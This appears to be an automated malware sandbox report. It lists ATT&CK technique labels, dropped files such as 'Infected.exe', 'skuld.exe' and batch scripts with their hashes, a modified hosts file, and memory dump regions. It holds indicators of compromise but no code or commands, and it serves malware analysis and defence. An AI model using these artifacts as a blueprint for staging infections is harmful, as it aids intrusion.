T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
938ffc2cba917b243d86b2cf76dcefb4

SHA1
234b53d91d075f16cc63c731eefdae278e2faad3

SHA256
5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

SHA512
e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
20KB

MD5
5c4ea44d69d9c1e05788f82169f399e5

SHA1
a621dddb8d989824444e47be1885c1e06e341087

SHA256
89f5c85a719b5635556eba78824a0d19953b5face5e22eac9bc54a18dd09e0e3

SHA512
a63ae0972481e8cd71392805ec7b7c4b0955d897e77e2fe81869ed8242f7961d34a5c994c54919105fd0f1ade438652e302acc358d93b2a8881d9f44f6e03b89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
3ac6bd1d20aaaffb55f0ab11a5302a77

SHA1
03f2642a9263382803bf963c7a0781e0333a756e

SHA256
b941918fdb53fc0080deac53f1e542559528d0efddd9af2316e997b497516174

SHA512
3eda7d4faf24f5062e390e243d8a2be1efea3b775ee81a057d884ab6fbd5da9804012950f0a39160db15983dfc9ffc00500c1fa320d6a6862e6aab9c691d02d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf7b73e38e4a79c2a863a0c331e2000e

SHA1
8086254ce77c67e94b9c1380e3f502523399ab9e

SHA256
669c79889af6eeb7b96e8050999bf35a9c731b0f03df64496939ebdc043fdad0

SHA512
a777d81016f910303546a20f3d1a666fb408fc7c0b442874a910b84317682befc8287c5eb04e5f00fdee156675b699538d9ae3e47dcde24da4f35e68b649e241

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
083782a87bd50ffc86d70cbc6f04e275

SHA1
0c11bc2b2c2cf33b17fff5e441881131ac1bee31

SHA256
7a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f

SHA512
a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c1a54dd5a1ab44cc4c4afd42f291c863

SHA1
b77043ab3582680fc96192e9d333a6be0ae0f69d

SHA256
c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

SHA512
010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

Download Submit
C:\Users\Admin\AppData\Local\Temp\9Hn8rYyhvX\Display (1).png

Filesize
429KB

MD5
957f39903a8865da96a674de3e1bc702

SHA1
63dcc0d1a40169af4d44b9d1bd0d6ccd2775dfa3

SHA256
8477d107136c4b163fc8c9231aa7127817ca4abc3364fd6bff1c4c4bd971d945

SHA512
58e19894fb4dd68d4bbd46456ef22c06d99e6567709aa4c4aeb3eb97a5194da6c0dba6394e5acf9c33d6a2e62f47d000d15ccad811542804bd537bdb13d97574

Download Submit
C:\Users\Admin\AppData\Local\Temp\AogGDDzrKJ\Display (1).png

Filesize
429KB

MD5
5fcc9b2cb7db42c723b2179c9801e0d5

SHA1
b6432cc7241404dd80ceb269ac7f7edfa25d1162

SHA256
a75b213081cad4f0a33d4711a346da10a79072f07a4cfdadaadfe213efe58641

SHA512
e03dceb1f3658c40f2aec25a21ab57ab4241ab682f3cf44c0ecfa7a8ec7868206b99016f7897931af46afd6e0834a54a70d121d74aeb9e7755154d425120fe23

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES105.tmp

Filesize
1KB

MD5
2fb11b260d7f110f059944706dbdd0a1

SHA1
e038cea25cdd6d1d71dd24ed817a6a38406092c5

SHA256
27ccfb8544e169728759b8d666ee2bf0d2be80a78afe430ca1b24386e7432079

SHA512
3a76a19c30cab0ad2eae4894e196dd99a7f568bc11a4f18d50f1e058b9106dce78c88fdb7d0ea312ed711efd761d0cd6b441c65a6a57201a9d9bfb34ade18ea2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1C1E.tmp

Filesize
1KB

MD5
039eaf612fad39956f1b32f9d75fcb5a

SHA1
ce86749f78d91d29cc5ccc947e8c944676083c61

SHA256
15db470d73f69383e9fe31fc181bd73e672d3394cdd74608789c7b79e3f18ad1

SHA512
13d2df52b1026b6fca1ad96902d173ded4a5d7fbfcef6be4131bf1b6ef50518455a7686f482ad0d9d7f7181ffd255d852e1ab1d61992eea7aadd4edacbdbc7a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.exe

Filesize
4.6MB

MD5
35eefe804869dc29fb80b873a22b5429

SHA1
e360ffd23f110a02fede39d6cf5c11bad9942a7e

SHA256
06bf5c4fae8a3daae451bd03bd5c2939c3698779d11fe438bf3cbe00d7d8f116

SHA512
f6e76e5d768666232781cab6230a6c7bc2e1d95988442240875b94264db41412d66bfae39b3097dbab44585d4e6f124543e3a2d9a0a6c4374ed3bef6490fda9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected1.bat

Filesize
17.7MB

MD5
064380af45c837fdfa6ee92bedbfc152

SHA1
9d37be37e00bd92d665e329c1b12246b39d63527

SHA256
28da4bf294225ebc10d29ab0c023967c76dc6a9a7fd8595295e23409f4328910

SHA512
774d1c7a0793b9ca62f54d379e0b95538e0a3fac5d19cfcde426118c3b1eb9d9f882be0b08c84ed71e282705e8a9483fba554814ed814ae210acb5b35cb77b57

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe

Filesize
9.5MB

MD5
1cd52de222b8ddc6aeeaf7671ec29065

SHA1
80c729c6380cc1b66cc070b00ba4d1aa875a9e09

SHA256
0f56da5cdc01b3e1f076a9dfe7b5cf451fa00ce23799d8cfb40ffc04fdcf8c55

SHA512
3122092544fd28e6b6255d812bc76694004430d37eecdf94b287fe72b6e9bebdda3a3fcc02194644b3ecfe12b7e91399ddcc2696c1824d1d05de89c0408afcc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.bat

Filesize
5.6MB

MD5
4a7d24799a4fb25ccf141b6e7ac5ae65

SHA1
cf7606a711025e9a648aaea03547cf4a5a1c439b

SHA256
f588fa3dfcdb422d0460fd7778524417dc758dad980c9dfc78d6ca3c4f2dd64b

SHA512
10517e84ec64a8c7058cea2fbe05d326224541a46b8caff688d05d148387b5b935f22e0c3d180e879996fd37f7486212cf3f91a5445c45c67150b0ebba6b185c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.exe

Filesize
63KB

MD5
4ed4b5559ef1eeeb05150a330436bba3

SHA1
66e5b0dfdf5fdcf7022ab0529eac7477e3d2ee10

SHA256
84500ea91119c288951811d97a2c335b512a4253e1e986c0188d380395ba0073

SHA512
c50ac45e9eb35cdcd7e7ec02d9d4715602f882af203d80b579e4cf39880e18db4dcd3dd04f44773e203cd12898de4d42bc3ec571bcffd7921fd04fa7e36d7b10

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ld0ujm4k.dgh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aoy1jcul\aoy1jcul.dll

Filesize
4KB

MD5
a7eca7e3e8137cf665cb2d138d5b5975

SHA1
a22c5cb728bf8a7dd55f9594f7553dbe7798a9ad

SHA256
68d55e0396d857681e68a2afbac05e41ad5e4f18edb9e87c39ec111a62f9c188

SHA512
173b76ea392ca38bfb30d17cf96eea850bfde1471a0b8026159abe39b13fec4afd87240d4d752d421c800b3c06a6e5cc6a8c771bb120c2dee232cab79b89d76a

Download Submit
C:\Users\Admin\AppData\Local\Temp\commonfiles-temp\Admin\ExpandBackup.doc

Filesize
321KB

MD5
efb912e9277b7cb2abab8dbec975f11e

SHA1
f2f571f93a8c24b95c350bef93253c2906a60de0

SHA256
3f74c9b4e847cad618d8f9f102b730287b226706e8ae7e5ab21052461bc39778

SHA512
ca1d369bb161791415c3e98410094c282895032bccbf04f0369d073215b7fb291df23c5f6158ad42734ec4b2778160e0777cc8a0a734991eab6ace0c388f86fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ku4eim0a\ku4eim0a.dll

Filesize
4KB

MD5
baa05a3d5efacdd469149b51f4da730e

SHA1
27399463a83f027689384c61c1f79b26176acf3f

SHA256
6ce8fe832b62dfa4301a83d288a60c9868e0e10fbf558605d7ec0b8213d83fca

SHA512
0db21e7c04f77cd64dbf5c861bdf2e63498c9a9f9647eaa38bbeee01d0fd0ab0d1778a925435a9a59394e83bf13a09f1035790f6942d52ac5d13a71f2f7ded61

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
3KB

MD5
61892ca02e7a78d2254f5e1400ed2b98

SHA1
64d1eec9423991705111e54d2640a0260b4122f8

SHA256
f1d52946888f2acc859388b0476a006edd3bda1ccff90c78391186115bc9cd6d

SHA512
6f20c6ea33aab07c1f54688aca3434cd2682d545699983548403db44906031db3d5703ff4db9a7bf5efb34ff5d92f96da264397e4b5e71166ee3e137944685a3

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aoy1jcul\CSCF3362D6BBA4422A964D6DC87ED6510.TMP

Filesize
652B

MD5
c0c52330dceb48ab442f15c6050effaa

SHA1
d7b4ef04996e1a674bd79ddf3cae3699096c97ca

SHA256
a518cb5c3ca3666f96e794e48833f8c1447eb84f2cb21430c03856ebd8c51556

SHA512
c143850606902dffc007b1f0f3f7a1e41f70bdb2697d09c4ac925c05adad3c3db756c447920896d1c5f7daff62b48d90a2ef8478dcdcbc576523c5b6cb14154f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aoy1jcul\aoy1jcul.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aoy1jcul\aoy1jcul.cmdline

Filesize
607B

MD5
b41ae34f248a4463941b3e840e614979

SHA1
546a038984472a2c136d090044f233217795c4f5

SHA256
b3da69c290eef70c11feaeb574aac77118f083ba18451e2459271914784197b7

SHA512
fd1a6873db10a8af348ad1f5415a000f8b1d10a5d21e63662aee9d0d46b5fe14fa0eb79f345cca4c156214bc606a312ccb48cb0a216dc54b785a20ab5d82c4e7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ku4eim0a\CSC392E2F98A114C6DB12CDC7A62D03F5F.TMP

Filesize
652B

MD5
6a13819859b59abaa373fc02c1e3d57f

SHA1
e629818084f82f9b7573680be702cb03887ef625

SHA256
6b4e37235c59cb1a999b459677c1a62b74365d48dfc8536e7a2509d13de708b0

SHA512
c529d3db7d32e54b8d7c1091d317471dfb4bde4f68649e85db58d5541040b21bc149ad8e2bcfda368a0644cd5bd9915a7b2dcfe1cd780396c80253583d88e7e6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ku4eim0a\ku4eim0a.cmdline

Filesize
607B

MD5
d323cecfdc783f0c0106497d5403c55f

SHA1
4f737557a6cb66393e81d6aa2deb828c05660529

SHA256
310e437ded3c25c511e813585937a4696a16dd46a6963cbb71313bc074bc969e

SHA512
5dfaafaa94f76322a31cd85760fd4e5eb4bc54577345ab7f13a46227460c36d4a5ddf3837b5f1e69329a0cf6d5655e36adbe4d9b38bbe99012971ebe2d397df6

Download Submit
memory/1072-137-0x0000000004E30000-0x0000000004E38000-memory.dmp

Filesize
32KB

Download
memory/1072-138-0x00000000267B0000-0x0000000027156000-memory.dmp

Filesize
9.6MB

Download
memory/1072-104-0x0000000005AB0000-0x0000000005E04000-memory.dmp

Filesize
3.3MB

Download
memory/1072-143-0x0000000007550000-0x0000000007566000-memory.dmp

Filesize
88KB

Download
memory/2356-158-0x0000000000620000-0x0000000000636000-memory.dmp

Filesize
88KB

Download
memory/2924-195-0x0000021A702B0000-0x0000021A704CC000-memory.dmp

Filesize
2.1MB

Download
memory/3848-11-0x0000000006410000-0x0000000006476000-memory.dmp

Filesize
408KB

Download
memory/3848-22-0x00000000064F0000-0x0000000006844000-memory.dmp

Filesize
3.3MB

Download
memory/3848-27-0x00000000083E0000-0x0000000008A5A000-memory.dmp

Filesize
6.5MB

Download
memory/3848-28-0x0000000007D80000-0x0000000007D9A000-memory.dmp

Filesize
104KB

Download
memory/3848-26-0x0000000007CE0000-0x0000000007D56000-memory.dmp

Filesize
472KB

Download
memory/3848-25-0x0000000007B60000-0x0000000007BA4000-memory.dmp

Filesize
272KB

Download
memory/3848-24-0x0000000006F30000-0x0000000006F7C000-memory.dmp

Filesize
304KB

Download
memory/3848-29-0x00000000033F0000-0x00000000033F8000-memory.dmp

Filesize
32KB

Download
memory/3848-30-0x000000004BD90000-0x000000004D060000-memory.dmp

Filesize
18.8MB

Download
memory/3848-23-0x00000000069B0000-0x00000000069CE000-memory.dmp

Filesize
120KB

Download
memory/3848-52-0x0000000072660000-0x0000000072E10000-memory.dmp

Filesize
7.7MB

Download
memory/3848-5-0x000000007266E000-0x000000007266F000-memory.dmp

Filesize
4KB

Download
memory/3848-12-0x0000000006480000-0x00000000064E6000-memory.dmp

Filesize
408KB

Download
memory/3848-95-0x0000000072660000-0x0000000072E10000-memory.dmp

Filesize
7.7MB

Download
memory/3848-6-0x00000000034F0000-0x0000000003526000-memory.dmp

Filesize
216KB

Download
memory/3848-10-0x00000000062B0000-0x00000000062D2000-memory.dmp

Filesize
136KB

Download
memory/3848-9-0x0000000072660000-0x0000000072E10000-memory.dmp

Filesize
7.7MB

Download
memory/3848-8-0x0000000072660000-0x0000000072E10000-memory.dmp

Filesize
7.7MB

Download
memory/3848-7-0x0000000005C80000-0x00000000062A8000-memory.dmp

Filesize
6.2MB

Download
memory/4272-132-0x000001FAC5720000-0x000001FAC5728000-memory.dmp

Filesize
32KB

Download
memory/4680-220-0x0000028AAD640000-0x0000028AAD648000-memory.dmp

Filesize
32KB

Download
memory/4744-71-0x000001DAA5100000-0x000001DAA5122000-memory.dmp

Filesize
136KB

Download